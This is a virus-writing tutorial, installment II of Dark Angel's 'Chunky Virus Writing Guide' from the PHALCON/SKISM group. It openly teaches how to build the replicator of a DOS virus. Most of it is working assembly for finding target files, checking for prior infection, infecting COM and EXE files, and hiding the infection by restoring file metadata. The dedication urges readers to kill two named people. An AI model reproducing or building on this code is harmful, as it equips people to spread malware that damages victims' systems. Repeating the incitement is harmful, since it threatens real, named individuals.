//==//  //  //  /||      //      //====  //==//  //|   //
     //  //  //  //  //||     //      //      //  //  //||  //
    //==//  //==//  //=||    //      //      //  //  // || //
   //      //  //  //  ||   //      //      //  //  //  ||//
  //      //  //  //   ||  //====  //====  //==//  //   ||/
  
     /====   // //     //  /====   /|   /|
    //      // //     //  //      //|  //|
    ===\   // //     //   ===\   //|| //||
      //  //  \\    //      //  // ||// ||
  ====/  //    \\  //   ====/  //  ||/  ||
  
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  DISCLAIMER: Pretend you see a disclaimer here.
    99.44% of the code guaranteed to work.
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  DEDICATION: Please try your best to kill those
    who made this possible, especially that dumb
    bitch who doesn't know her own name (Patty),
    and her lover Ross M. Greenberg.
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  GREETS -N- STUFF: Greets go to all the members
    of PHALCON/SKISM.  I wish to give buckets o'
    thanks to Hellraiser, Garbageheap, and Demo-
    gorgon.  No thanks this time to Orion Rouge,
    the godly master of idiocy.
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  
  Dark Angel's Chunky Virus Writing Guide
  DDDD DDDDDDD DDDDDD DDDDD DDDDDDD DDDDD
  
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  INSTALLMENT II:  THE REPLICATOR
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  
  In the  last installment of my Virus Writing Guide, I explained the various
  parts of  a virus  and went  into a  brief discussion  about each.  In this
  issue, I  shall devote  all my  attention towards the replicator portion of
  the virus.  I promised code and code I shall present.
  
  However, I  shall digress  for a moment because it has come to my attention
  that some  mutant  copies  of  the  first  installment  were  inadvertently
  released.   These copies  did not  contain a  vital section  concerning the
  calculation of offsets.
  
  You never  know where  your variables  and code  are going  to wind  up  in
  memory.   If you think a bit, this should be pretty obvious.  Since you are
  attaching the  virus to  the end  of a  program, the  location in memory is
  going to  be changed,  i.e. it  will be  larger by the size of the infected
  program.   So, to  compensate, we  must take  the change in offset from the
  original virus,  or the  delta offset,  and add  that to  all references to
  variables.
  
  Instructions that  use displacement,  i.e. relative  offsets, need  not  be
  changed.   These instructions are the JA, JB, JZ class of instructions, JMP
  SHORT, JMP label, and CALL.  Thus, whenever possible use these in favor of,
  say, JMP FAR PTR.
  
  Suppose in  the following  examples, si  is somehow  loaded with  the delta
  offset.
  
  Replace
    mov ax, counter
  With
    mov ax, word ptr [si+offset counter]
  
  Replace
    mov dx, offset message
  With
    lea dx, [si+offset message]
  
  You may  be asking, "how the farg am I supposed to find the delta offset!?"
  It is simple enough:
  
    call setup
  setup:
    pop  si
    sub  si, offset setup
  
  An explanation  of the  above fragment  is in order.  CALL setup pushes the
  location of the next instruction, i.e. offset setup, onto the stack.  Next,
  this location  is POPed  into si.   Finally,  the ORIGINAL  offset of setup
  (calculated at  compile-time) is  subtracted from  si, giving you the delta
  offset.   In the  original virus,  the delta offset will be 0, i.e. the new
  location of setup equals the old location of setup.
  
  It is  often preferable to use bp as your delta offset, since si is used in
  string instructions.  Use whichever you like.  I'll randomly switch between
  the two as suits my mood.
  
  Now back to the other stuff...
  
  A biological  virus is a parasitic "organism" which uses its host to spread
  itself.   It must keep the host alive to keep itself "alive."  Only when it
  has spread  everywhere will  the host  die a  painful, horrible death.  The
  modern electronic  virus is  no different.   It  attaches itself  to a host
  system and  reproduces until the entire system is fucked.  It then proceeds
  and neatly wrecks the system of the dimwit who caught the virus.
  
  Replication is  what distinguishes  a virus  from a simple trojan.  Anybody
  can write  a trojan,  but a  virus is  much more  elegant.   It acts almost
  invisibly, and  catches the victim off-guard when it finally surfaces.  The
  first question  is, of  course, how  does a virus spread?  Both COM and EXE
  infections (along with sample infection routines) shall be presented.
  
  There are  two major  approaches to  virii: runtime and TSR.  Runtime virii
  infect, yup,  you guessed  it, when  the infected program is run, while TSR
  virii go  resident  when  the  infected  programs  are  run  and  hook  the
  interrupts and  infect when  a file  is  run,  open,  closed,  and/or  upon
  termination (i.e.  INT  20h,  INT  21h/41h).    There  are  advantages  and
  disadvantages to  each.   Runtime virii  are harder to detect as they don't
  show up on memory maps, but, on the other hand, the delay while it searches
  for and  infects a file may give it away.  TSR virii, if not properly done,
  can be  easily spotted  by utilities such as MAPMEM, PMAP, etc, but are, in
  general, smaller  since they  don't need  a function to search for files to
  infect.   They are  also faster than runtime virii, also because they don't
  have to  search for files to infect.  I shall cover runtime virii here, and
  TSR virii in a later installment.
  
  Here is a summary of the infection procedure:
       1) Find a file to infect.
       2) Check if it meets the infection criteria.
       3) See if it is already infected and if so, go back to 1.
       4) Otherwise, infect the file.
       5) Cover your tracks.
  
  I shall  go through  each of  these steps and present sample code for each.
  Note that  although a  complete virus  can be  built from  the  information
  below, you  cannot merely  rip the  code out  and stick it together, as the
  fragments are  from various  different virii that I have written.  You must
  be somewhat  familiar with assembly.  I present code fragments; it is up to
  you to either use them as examples or modify them for your own virii.
  
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  STEP 1 - FIND A FILE TO INFECT
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  Before you  can infect  a file,  you have  to find it first!  This can be a
  bottleneck in  the performance  of the  virus, so  it  should  be  done  as
  efficiently as possible.  For runtime virii, there are a few possibilities.
  You could  infect files in only the current directory, or you could write a
  directory traversal function to infect files in ALL directories (only a few
  files per  run, of  course), or you could infect files in only a few select
  directories.   Why would  you choose  to only  infect files  in the current
  directory?   It would  appear to  limit the  efficacy  of  the  infections.
  However, this  is done  in some  virii either  to speed  up the virus or to
  shorten the code size.
  
  Here is a directory traversal function.  It uses recursion, so it is rather
  slow, but it does the job.  This was excerpted with some modifications from
  The Funky Bob Ross Virus [Beta].
  
  traverse_fcn proc    near
          push    bp                      ; Create stack frame
          mov     bp,sp
          sub     sp,44                   ; Allocate space for DTA
  
          call    infect_directory        ; Go to search & destroy routines
  
          mov     ah,1Ah                  ;Set DTA
          lea     dx,word ptr [bp-44]     ; to space allotted
          int     21h                     ;Do it now!
  
          mov     ah, 4Eh                 ;Find first
          mov     cx,16                   ;Directory mask
          lea     dx,[si+offset dir_mask] ; *.*
          int     21h
          jmp     short isdirok
  gonow:
          cmp     byte ptr [bp-14], '.'   ; Is first char == '.'?
          je      short donext            ; If so, loop again
          lea     dx,word ptr [bp-14]     ; else load dirname
          mov     ah,3Bh                  ; and changedir there
          int     21h
          jc      short donext              ; Do next if invalid
          inc     word ptr [si+offset nest] ; nest++
          call    near ptr traverse_fcn     ; recurse directory
  donext:
          lea     dx,word ptr [bp-44]     ; Load space allocated for DTA
          mov     ah,1Ah                  ; and set DTA to this new area
          int     21h                     ; 'cause it might have changed
  
          mov     ah,4Fh                  ;Find next
          int     21h
  isdirok:
          jnc     gonow                   ; If OK, jmp elsewhere
          cmp     word ptr [si+offset nest], 0 ; If root directory
                                               ;  (nest == 0)
          jle     short cleanup                ; then Quit
          dec     word ptr [si+offset nest]    ; Else decrement nest
          lea     dx, [si+offset back_dir]; '..'
          mov     ah,3Bh                  ; Change directory
          int     21h                     ; to previous one
  cleanup:
          mov     sp,bp
          pop     bp
          ret
  traverse_fcn endp
  
  ; Variables
  nest     dw     0
  back_dir db     '..',0
  dir_mask db     '*.*',0
  
  The code  is self-explanatory.   Make  sure  you  have  a  function  called
  infect_directory which scans the directory for possible files to infect and
  makes sure  it doesn't  infect already-infected  files.   This function, in
  turn, calls infect_file which infects the file.
  
  Note, as  I said  before, this  is slow.   A  quicker method, albeit not as
  global, is  the "dot  dot" method.   Hellraiser  showed me this neat little
  trick.   Basically, you  keep searching  each directory and, if you haven't
  infected enough,  go to the previous directory (dot dot) and try again, and
  so on.  The code is simple.
  
  dir_loopy:
          call    infect_directory
          lea     dx, [bp+dotdot]
          mov     ah, 3bh                 ; CHDIR
          int     21h
          jnc     dir_loopy               ; Carry set if in root
  
  ; Variables
  dotdot  db      '..',0
  
  Now you  must find a file to infect.  This is done (in the fragments above)
  by a  function called infect_directory.  This function  calls FINDFIRST and
  FINDNEXT a  couple of  times to find files to infect.  You should first set
  up a  new DTA.  NEVER use the DTA in the PSP (at 80h) because altering that
  will affect  the command-line  parameters  of  the  infected  program  when
  control is returned to it.  This is easily done with the following:
  
          mov     ah, 1Ah                 ; Set DTA
          lea     dx, [bp+offset DTA]     ; to variable called DTA (wow!)
          int     21h
  
  Where DTA  is a 42-byte chunk of memory.  Next, issue a series of FINDFIRST
  and FINDNEXT calls:
  
          mov     ah, 4Eh                 ; Find first file
          mov     cx, 0007h               ; Any file attribute
          lea    dx, [bp+offset file_mask]; DS:[DX] --> filemask
          int     21h
          jc      none_found
  found_another:
          call    check_infection
          mov     ah, 4Fh                 ; Find next file
          int     21h
          jnc     found_another
  none_found:
  
  Where file_mask  is DBed  to either '*.EXE',0 or '*.COM',0.  Alternatively,
  you could FINDFIRST for '*.*',0 and check if the extension is EXE or COM.
  
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  STEP 2 - CHECK VERSUS INFECTION CRITERIA
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  Your virus  should be  judicious in  its infection.  For example, you might
  not want  to  infect  COMMAND.COM,  since  some  programs  (i.e.  the  puny
  FluShot+) check its CRC or checksum on runtime.  Perhaps you do not wish to
  infect the  first valid file in the directory.  Ambulance Car is an example
  of such  a virus.   Regardless,  if there  is some  infection criteria, you
  should check  for it  now.   Here's example  code checking  if the last two
  letters are 'ND', a simple check for COMMAND.COM:
  
          cmp     word ptr [bp+offset DTA+35], 'DN'  ; Reverse word order
          jz      fail_check
  
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  STEP 3 - CHECK FOR PREVIOUS INFECTION
  DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  Every virus has certain characteristics with which you can identify whether
  a file  is infected  already.   For example,  a certain  piece of  code may
  always occur  in a  predictable place.   Or  perhaps the JMP instruction is
  always coded  in the  same manner.   Regardless,  you should make sure your
  virus has  a marker  so that  multiple infections  of the  same file do not
  occur.  Here's an example of one such check (for a COM file infector):
  
          mov     ah,3Fh                          ; Read first three
          mov     cx, 3                           ; bytes of the file
          lea     dx, [bp+offset buffer]          ; to the buffer
          int     21h
  
          mov     ax, 4202h                       ; SEEK from EOF
          xor     cx, cx                          ; DX:CX = offset
          xor     dx, dx                          ; Returns filesize
          int     21h                             ; in DX:AX
  
          sub     ax, virus_size + 3
          cmp     word ptr [bp+offset buffer+1], ax
          jnz     infect_it
  
  bomb_out:
          mov     ah, 3Eh                         ; else close the file
          int     21h                             ;  and go find another
  
  In this  example, BX  is assumed to hold a file handle to the program to be
  checked for  infection and virus_size equals the size of the virus.  Buffer
  is assumed  to be  a three-byte  area of  empty space.   This code fragment
  reads the  first three bytes into buffer and then compares the JMP location
  (located in  the word  beginning at  buffer+1) to  the filesize  If the JMP
  points to  virus_size bytes  before the  EOF,  then  the  file  is  already
  infected with  this virus.   Another method would be to search at a certain
  location in the file for a marker byte or word.  For example:
  
          mov     ah, 3Fh                         ; Read the first four
          mov     cx, 4                           ; bytes of the file into
          lea     dx, [bp+offset buffer]          ; the buffer.
          int     21h
  
          cmp     byte ptr [buffer+3], infection_id_byte ; Check the fourth
          jz      bomb_out                        ; byte for the marker
  infect_it:
  
  DDDDDDDDDDDDDDDDDDDDDDDD
  STEP 4 - INFECT THE FILE
  DDDDDDDDDDDDDDDDDDDDDDDD
  This is  the "guts"  of the  virus, the  heart of the replicator.  Once you
  have located  a potential  file, you  must save the attributes, time, date,
  and size for later use.  The following is a breakdown of the DTA:
  
    Offset     Size      What it is
      0h       21 BYTES  Reserved, varies as per DOS version
     15h       BYTE      File attribute
     16h       WORD      File time
     18h       WORD      File date
     1Ah       DWORD     File size
     1Eh       13 BYTES  ASCIIZ filename + extension
  
  As you can see, the DTA holds all the vital information about the file that
  you need.  The following code fragment is a sample of how to save the info:
  
          lea  si, [bp+offset DTA+15h]            ; Start from attributes
          mov  cx, 9                              ; Finish with size
          lea  di, [bp+offset f_attr]             ; Move into your locations
          rep  movsb
  ; Variables needed
  f_attr  db   ?
  f_time  dw   ?
  f_date  dw   ?
  f_size  dd   ?
  
  You can  now change the file attributes to nothing through INT 21h/Function
  43h/Subfunction 01h.   This  is to  allow infection  of system, hidden, and
  read only  files.   Only primitive  (or minimal)  virii cannot  handle such
  files.
  
          lea  dx, [bp+offset DTA+1eh]            ; DX points to filename in
          mov  ax, 4301h                          ; DTA
          xor  cx, cx                             ; Clear file attributes
          int  21h                                ; Issue the call
  
  Once the  attributes have  been annihilated,  you may  open the  file  with
  callous impunity.  Use a handle open in read/write mode.
  
          lea  dx, [bp+offset DTA+1eh]            ; Use filename in DTA
          mov  ax, 3d02h                          ; Open read/write mode
          int  21h                                ; duh.
          xchg ax, bx                             ; Handle is more useful in
                                                  ; BX
  
  Now we come to the part you've all been waiting for: the infection routine.
  I am  pleased to present code which will handle the infection of COM files.
  Yawn, you  say, I can already do that with the information presented in the
  previous installment.   Ah,  but there  is more,  much more.   A sample EXE
  infector shall also be presented shortly.
  
  The theory  behind COM  file infection was covered in the last installment,
  so I shall not delve into the details again.  Here is a sample infector:
  
  ; Sample COM infector.  Assumes BX holds the file handle
  ; Assume COM file passes infection criteria and not already infected
          mov     ah, 3fh
          lea     dx, [bp+buffer1]
          mov     cx, 3
          int     21h
  
          mov     ax, 4200h                       ; Move file pointer to
          xor     cx, cx                          ; the beginning of the
          xor     dx, dx                          ; file
          int     21h
  
          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
          mov     ax, word ptr [bp+f_size]
          sub     ax, part1_size                   ; Usually 3
          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
  
  ; Encode JMP instruction to replace beginning of the file
          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
          mov     ax, word ptr [bp+f_size]
          sub     ax, part1_size                   ; Usually 3
          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
  
  ; Write the JMP instruction to the beginning of the file
          mov     ah, 40h                          ; Write CX bytes to
          mov     cx, 3                            ; handle in BX from
          lea     dx, [bp+buffer2]                 ; buffer -> DS:[DX]
          int     21h
  
          mov     ax, 4202h                        ; Move file pointer to
          xor     cx, cx                           ; end of file
          xor     dx, dx
          int     21h
  
          mov     ah, 40h                          ; Write CX bytes
          mov     cx, endofvirus - startofpart2    ; Effective size of virus
          lea     dx, [bp+startofpart2]            ; Begin write at start
          int     21h
  
  ; Variables
  buffer1 db 3 dup (?)                             ; Saved bytes from the
                                                   ; infected file to restore
                                                   ; later
  buffer2 db 3 dup (?)                             ; Temp buffer
  
  After some  examination, this code will prove to be easy to understand.  It
  starts by reading the first three bytes into a buffer.  Note that you could
  have done  this in  an earlier  step, such  as when  you are checking for a
  previous infection.   If  you have  already done  this, you obviously don't
  need to  do it again.  This buffer must be stored in the virus so it can be
  restored later when the code is executed.
  
  EXE infections  are also  simple, although  a  bit  harder  to  understand.
  First, the thoery.  Here is the format of the EXE header:
  
   Ofs Name                Size      Comments
   00  Signature           2 bytes   always 4Dh 5Ah (MZ)
  *02  Last Page Size      1 word    number of bytes in last page
  *04  File Pages          1 word    number of 512 byte pages
   06  Reloc Items         1 word    number of entries in table
   08  Header Paras        1 word    size of header in 16 byte paras
   0A  MinAlloc            1 word    minimum memory required in paras
   0C  MaxAlloc            1 word    maximum memory wanted in paras
  *0E  PreReloc SS         1 word    offset in paras to stack segment
  *10  Initial SP          1 word    starting SP value
   12  Negative checksum   1 word    currently ignored
  *14  Pre Reloc IP        1 word    execution start address
  *16  Pre Reloc CS        1 word    preadjusted start segment
   18  Reloc table offset  1 word    is offset from start of file)
   1A  Overlay number      1 word    ignored if not overlay
   1C  Reserved/unused     2 words
  * denotes bytes which should be changed by the virus
  
  To understand  this, you  must first  realise that EXE files are structured
  into segments.  These segments may begin and end anywhere.  All you have to
  do to  infect an EXE file is tack on your code to the end.  It will then be
  in its  own segment.  Now all you have to do is make the virus code execute
  before the  program code.   Unlike  COM  infections,  no  program  code  is
  overwritten, although  the header  is modified.   Note  the virus can still
  have the  V1/V2 structure,  but only V2 needs to be concatenated to the end
  of the infected EXE file.
  
  Offset 4  (File Pages)  holds the  size of the file divided by 512, rounded
  up.   Offset 2 holds the size of the file modulo 512.  Offset 0Eh holds the
  paragraph displacement  (relative to  the end of the header) of the initial
  stack segment  and Offset 10h holds the displacement (relative to the start
  of the  stack segment)  of the initial stack pointer.  Offset 16h holds the
  paragraph displacement of the entry point relative to the end of the header
  and offset  14h holds the displacement entry point relative to the start of
  the entry  segment.   Offset 14h  and 16h are the key to adding the startup
  code (the virus) to the file.
  
  Before you  infect the  file, you  should save the CS:IP and SS:SP found in
  the EXE  header, as  you need  to restore  them upon  execution.  Note that
  SS:SP is NOT stored in Intel reverse-double-word format.  If you don't know
  what I'm  talking about, don't worry; it's only for very picky people.  You
  should also save the file length as you will need to use that value several
  times during  the infection  routine.   Now it's  time  to  calculate  some
  offsets!   To find  the new  CS:IP and  SS:SP, use  the following code.  It
  assumes the file size is loaded in DX:AX.
  
          mov     bx, word ptr [bp+ExeHead+8]    ; Header size in paragraphs
               ;  ^---make sure you don't destroy the file handle
          mov     cl, 4                          ; Multiply by 16.  Won't
          shl     bx, cl                         ; work with headers > 4096
                                                 ; bytes.  Oh well!
          sub     ax, bx                         ; Subtract header size from
          sbb     dx, 0                          ; file size
    ; Now DX:AX is loaded with file size minus header size
          mov     cx, 10h                        ; DX:AX/CX = AX Remainder DX
          div     cx
  
  This code  is rather inefficient.  It would probably be easier to divide by
  16 first  and then perform a straight subtraction from AX, but this happens
  to be  the code  I chose.   Such is life. However, this code does have some
  advantages over  the more  efficient one.   With this, you are certain that
  the IP  (in DX)  will be under 15.  This allows the stack to be in the same
  segment as the entry point, as long as the stack pointer is a large number.
  
  Now AX*16+DX  points to  the end  of code.  If the virus begins immediately
  after the  end of the code, AX and DX can be used as the initial CS and IP,
  respectively.   However, if  the virus  has some junk (code or data) before
  the entry  point, add the entry point displacement to DX (no ADC with AX is
  necessary since DX will always be small).
  
          mov     word ptr [bp+ExeHead+14h], dx  ; IP Offset
          mov     word ptr [bp+ExeHead+16h], ax  ; CS Displacement in module
  
  The SP  and SS  can now  be calculated.   The  SS is  equal to the CS.  The
  actual value  of the SP is irrelevant, as long as it is large enough so the
  stack will  not overwrite code (remember: the stack grows downwards).  As a
  general rule,  make sure the SP is at least 100 bytes larger than the virus
  size.  This should be sufficient to avoid problems.
  
          mov     word ptr [bp+ExeHead+0Eh], ax  ; Paragraph disp. SS
          mov     word ptr [bp+ExeHead+10h], 0A000h ; Starting SP
  
  All that  is left  to fiddle  in the  header is the file size.  Restore the
  original file  size from  wherever you  saved it  to DX:AX.   To  calculate
  DX:AX/512 and DX:AX MOD 512, use the following code:
  
          mov     cl, 9                           ; Use shifts again for
          ror     dx, cl                          ; division
          push    ax                              ; Need to use AX again
          shr     ax, cl
          adc     dx, ax                          ; pages in dx
          pop     ax
          and     ah, 1                           ; mod 512 in ax
  
          mov     word ptr [bp+ExeHead+4], dx     ; Fix-up the file size in
          mov     word ptr [bp+ExeHead+2], ax     ; the EXE header.
  
  All that is left is writing back the EXE header and concatenating the virus
  to the end of the file.  You want code?  You get code.
  
          mov     ah, 3fh                         ; BX holds handle
          mov     cx, 18h                         ; Don't need entire header
          lea     dx, [bp+ExeHead]
          int     21h
  
          call    infectexe
  
          mov     ax, 4200h                       ; Rewind to beginning of
          xor     cx, cx                          ; file
          xor     dx, dx
          int     21h
  
          mov     ah, 40h                         ; Write header back
          mov     cx, 18h
          lea     dx, [bp+ExeHead]
          int     21h
  
          mov     ax, 4202h                       ; Go to end of file
          xor     cx, cx
          xor     dx, dx
          int     21h
  
          mov     ah, 40h                         ; Note: Only need to write
          mov     cx, part2size                   ;       part 2 of the virus
          lea     dx, [bp+offset part2start]      ;      (Parts of virus
          int     21h                             ;       defined in first
                                                  ;       installment of
                                                  ;       the guide)
  
  Note that this code alone is not sufficient to write a COM or EXE infector.
  Code is also needed to transfer control back to the parent program.  The
  information needed to do this shall be presented in the next installment.
  In the meantime, you can try to figure it out on your own; just remember
  that you must restore all that you changed.
  
  DDDDDDDDDDDDDDDDDDDDDDDDDD
  STEP 5 - COVER YOUR TRACKS
  DDDDDDDDDDDDDDDDDDDDDDDDDD
  This step,  though simple  to do, is too easily neglected.  It is extremely
  important, as a wary user will be alerted to the presence of a virus by any
  unnecessary updates  to a  file.   In its  simplest form,  it involves  the
  restoration of   file  attributes, time  and date.   This  is done with the
  following:
  
          mov     ax, 5701h                      ; Set file time/date
          mov     dx, word ptr [bp+f_date]       ; DX = date
          mov     cx, word ptr [bp+f_time]       ; CX = time
          int     21h
  
          mov     ah, 3eh                        ; Handle close file
          int     21h
  
          mov     ax, 4301h                      ; Set attributes
          lea     dx, [bp+offset DTA + 1Eh]      ; Filename still in DTA
          xor     ch, ch
          mov     cl, byte ptr [bp+f_attrib]     ; Attribute in CX
          int     21h
  
  Remember also to restore the directory back to the original one if it
  changed during the run of the virus.
  
  DDDDDDDDDDDDDD
  WHAT'S TO COME
  DDDDDDDDDDDDDD
  I have been pleased with the tremendous response to the last installment of
  the guide.   Next  time, I  shall cover  the rest  of the  virus as well as
  various tips  and common tricks helpful in writing virii.  Until then, make
  sure you  look for  40Hex, the  official PHALCON/SKISM  magazine, where  we
  share tips and information pertinent to the virus community.